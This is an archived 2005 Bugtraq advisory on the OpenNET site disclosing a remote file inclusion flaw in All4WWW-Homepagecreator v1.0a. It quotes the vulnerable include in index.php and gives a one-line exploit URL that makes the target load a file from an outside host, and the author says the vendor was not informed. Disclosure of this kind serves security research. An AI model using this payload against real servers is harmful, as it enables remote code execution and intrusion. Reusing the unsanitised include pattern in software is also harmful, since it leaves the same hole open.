The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


All4WWW-Homepagecreator Remote Command Execution


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 14 Apr 2005 03:21:42 -0000
From: Francisco Alisson <dominusvis@click21.com.br.>
To: bugtraq@securityfocus.com
Subject: All4WWW-Homepagecreator Remote Command Execution
X-Virus-Scanned: antivirus-gw at tyumen.ru



################################################
#
#  Script: All4WWW-Homepagecreator
#  Version: v1.0a
#  Vendor: http://www.All4WWW.com
#
################################################

I. Bug Code
On index.php

...
if(!$site) {$site="home";}
include "$site.dat";
...


II. Exploit
[vuln-host]/index.php?site=http://&#091;host]/some-file

PS.: The vendor wasn't inform.

############################################
#           by Dominus_Vis
#          [Infektion Group]
############################################


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру